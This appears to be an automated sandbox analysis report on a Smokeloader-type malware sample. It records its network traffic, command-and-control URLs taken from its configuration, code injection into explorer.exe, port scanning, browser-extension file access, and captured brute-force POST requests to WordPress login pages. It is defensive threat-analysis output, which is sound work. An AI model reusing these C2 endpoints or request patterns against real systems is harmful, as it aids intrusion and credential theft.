Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:49389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:50243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:50233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:50383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:50325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:50375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:50462 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:50487 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:50630 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:51089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:50885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:50824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:51402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:51173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:51209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:51284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:51273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:51414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51492 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:51612 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:51394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:51064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:51046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:51746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:51467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:51851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:51644 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:51501 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:51922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:51635 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:51756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:51988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:52551 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:52667 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:52602 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:52590 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:52647 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:52826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:53117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:52996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:53370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:53435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:53462 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:53368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:53496 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:53610 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:53665 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:53896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:54092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:53994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:54424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:54457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:54116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:54094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:54728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:54279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:54465 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:55062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:54552 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:55043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:54083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:54422 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:55020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:55059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:55355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:55819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:55309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:55309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:56057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:56046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:56178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:56134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:56315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:57090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:57178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:57111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57112 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:57276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:57316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:57321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:57652 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:57677 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:57906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:57761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:57772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:57884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:57950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:57978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:57981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:57952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:57979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:58351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:58353 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:58355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:58352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:58276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:58484 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:58795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:59072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:59262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:59152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:59224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:59333 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:59336 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:59368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:59311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:59422 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:59516 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:59421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:59397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:59567 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:59688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:59815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:59728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:59812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:60015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:60394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:60439 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:60496 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:60812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:60815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:60809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:60834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:60837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:60761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:60884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:60917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:60902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:60881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:60926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:60932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:61045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:61051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:61014 version: TLS 1.2

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 8BAD.exe, 0000000B.00000002.2457464100.000000000536C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\wepibobupuwab.pdb source: 81F7.exe, 00000009.00000002.2370893903.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 00000009.00000000.2363837038.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 0000000A.00000000.2366840602.00000000005CA000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: IC:\wepibobupuwab.pdb$"] source: 81F7.exe, 00000009.00000002.2370893903.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 00000009.00000000.2363837038.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 0000000A.00000000.2366840602.00000000005CA000.00000002.00000001.01000000.00000009.sdmp

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Traffic

Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49706 -> 91.215.85.120:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 211.181.24.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.147.159.149 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: mx1.pub.mailpod8-cph3.one.com
Source: C:\Windows\explorer.exe	Network Connect: 185.172.128.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.252.102.119 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.221.35 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://goodfooggooftool.net/index.php
Source: Malware configuration extractor	URLs: http://sulugilioiu19.net/index.php
Source: Malware configuration extractor	URLs: http://selebration17io.io/index.php
Source: Malware configuration extractor	URLs: http://vacantion18ffeu.cc/index.php
Source: Malware configuration extractor	URLs: http://valarioulinity1.net/index.php
Source: Malware configuration extractor	URLs: http://buriatiarutuhuob.net/index.php
Source: Malware configuration extractor	URLs: http://cassiosssionunu.me/index.php

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Connects to many IPs within the same subnet mask (likely port scanning)

Source: global traffic

TCP traffic: Count: 10 IPs: 52.101.68.10,52.101.68.3,52.101.68.5,52.101.68.8,52.101.68.12,52.101.68.15,52.101.68.25,52.101.68.36,52.101.68.16,52.101.68.27

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 213.186.33.5 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 109.71.40.107 ports 22,3,443,4,80,21
Source: global traffic	TCP traffic: 52.101.42.6 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 185.159.70.47 ports 0,1,3,4,6,46031
Source: global traffic	TCP traffic: 81.169.145.143 ports 22,990,3,443,4,80,21
Source: global traffic	TCP traffic: 52.101.42.4 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 45.136.114.149 ports 22,990,2,443,2222,80,21
Source: global traffic	TCP traffic: 218.213.216.154 ports 22,143,222,3,443,465,993,4,995,2222,80,21
Source: global traffic	TCP traffic: 13.248.169.48 ports 22,143,990,110,222,3,443,465,993,4,587,995,80,21
Source: global traffic	TCP traffic: 104.21.66.152 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 202.124.241.196 ports 25,143,110,220,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 130.185.80.210 ports 25,143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 62.156.168.56 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 213.186.33.4 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 217.26.61.200 ports 22,990,2,443,80,21
Source: global traffic	TCP traffic: 91.195.240.135 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 85.214.145.11 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 91.136.8.194 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 104.47.22.74 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 76.223.54.146 ports 22,143,990,110,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 185.230.63.186 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 142.250.27.26 ports 143,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 188.40.92.90 ports 22,26,143,110,220,2,443,465,3535,993,995,80,21
Source: global traffic	TCP traffic: 217.70.178.1 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 3.33.130.190 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 162.255.118.13 ports 143,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 217.160.0.208 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 3.33.139.32 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 59.106.13.100 ports 22,143,990,1,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 3.33.243.145 ports 22,143,990,110,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 185.230.63.107 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 198.185.159.145 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 104.47.22.10 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.101.68.36 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 142.250.31.26 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 142.250.31.27 ports 25,143,110,220,465,993,587,5,995,9
Source: global traffic	TCP traffic: 217.160.122.119 ports 22,990,3,443,4,80,21
Source: global traffic	TCP traffic: 72.52.178.23 ports 22,990,1,2,443,995,80,21
Source: global traffic	TCP traffic: 185.177.47.38 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 213.254.36.27 ports 143,1,3,465,993,4,995
Source: global traffic	TCP traffic: 52.101.9.5 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 15.161.71.77 ports 22,143,990,110,222,3,443,465,993,4,587,995,80,21
Source: global traffic	TCP traffic: 75.2.70.75 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 52.101.41.0 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 81.169.145.86 ports 22,990,2,222,443,465,995,2222,80,21
Source: global traffic	TCP traffic: 78.47.2.70 ports 22,143,110,2,443,465,993,995,80,21
Source: global traffic	TCP traffic: 91.208.173.98 ports 143,465,993,4,5,995,6
Source: global traffic	TCP traffic: 45.147.96.4 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 23.236.62.147 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 178.33.253.225 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 104.21.54.169 ports 22,143,990,110,222,443,465,993,4,587,5,995,6,80,21
Source: global traffic	TCP traffic: 223.29.45.22 ports 22,143,990,3,443,465,993,4,587,995,80,21
Source: global traffic	TCP traffic: 81.169.145.97 ports 25,26,143,110,220,1,3,465,993,3535,4,587,995
Source: global traffic	TCP traffic: 91.136.8.144 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 52.101.8.34 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 13.232.255.130 ports 22,990,3,443,4,80,21
Source: global traffic	TCP traffic: 142.93.237.125 ports 25,143,110,220,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 86.105.245.69 ports 22,143,990,110,1,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 217.70.184.38 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 52.101.73.28 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 162.0.235.125 ports 22,2,222,443,80,21
Source: global traffic	TCP traffic: 208.109.43.169 ports 22,1,2,443,80,21
Source: global traffic	TCP traffic: 142.250.153.27 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.68.3 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 142.250.153.26 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 104.47.25.36 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 104.47.55.138 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 213.208.126.141 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 88.99.82.73 ports 25,143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 104.47.59.138 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 15.197.142.173 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 52.101.68.12 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.68.15 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 209.85.202.26 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 104.47.66.10 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 62.210.211.126 ports 22,990,2,222,443,2222,80,21
Source: global traffic	TCP traffic: 85.119.249.224 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 85.119.249.226 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 52.101.68.27 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 38.111.198.185 ports 25,143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 162.215.240.240 ports 22,3,443,4,80,21
Source: global traffic	TCP traffic: 217.160.0.179 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 104.47.24.36 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 46.105.45.21 ports 25,143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 64.233.184.27 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 185.39.146.199 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 13.248.243.5 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 103.224.182.253 ports 22,990,110,2,222,443,995,2222,80,21
Source: global traffic	TCP traffic: 15.197.204.56 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 3.33.152.147 ports 22,143,990,110,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 20.75.101.58 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 86.107.32.28 ports 22,1,2,222,443,60213,80,21
Source: global traffic	TCP traffic: 103.224.212.34 ports 25,143,110,220,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.101.73.11 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.101.73.12 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.73.19 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.73.15 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 85.13.138.112 ports 22,990,3,443,4,80,21
Source: global traffic	TCP traffic: 52.101.73.4 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 217.72.192.67 ports 25,143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.101.73.6 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.73.8 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 138.197.213.185 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 122.146.164.33 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 143.244.202.96 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 185.107.56.198 ports 22,143,990,110,222,3,443,465,993,4,587,995,80,21
Source: global traffic	TCP traffic: 162.241.216.197 ports 22,143,220,2,443,465,993,995,80,21
Source: global traffic	TCP traffic: 144.91.85.110 ports 22,990,2,443,80,21
Source: global traffic	TCP traffic: 212.227.15.41 ports 25,465,4,587,5,6
Source: global traffic	TCP traffic: 221.121.158.21 ports 22,990,2,443,80,21

Found C&C like URL pattern

Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 138Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 137Content-Type: application/x-www-form-urlencoded
